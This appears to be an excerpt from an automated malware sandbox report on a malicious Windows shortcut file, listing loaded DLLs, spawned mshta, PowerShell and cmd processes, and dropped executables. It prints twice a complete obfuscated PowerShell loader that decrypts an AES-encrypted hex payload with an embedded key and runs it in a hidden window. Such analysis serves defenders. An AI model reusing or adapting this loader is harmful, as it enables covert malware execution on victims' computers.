Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: JSWunwO4rS.lnk

LNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253)
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253)			Jump to behavior

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Code function: 9_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

9_2_00406328

Source: IntroductoryTunes.exe.7.dr

Static PE information: real checksum: 0xfda7c should be: 0xfb54f

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848B200BD pushad ; iretd		2_2_00007FF848B200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848B400BD pushad ; iretd		4_2_00007FF848B400C1

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\136140\Concerts.com			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
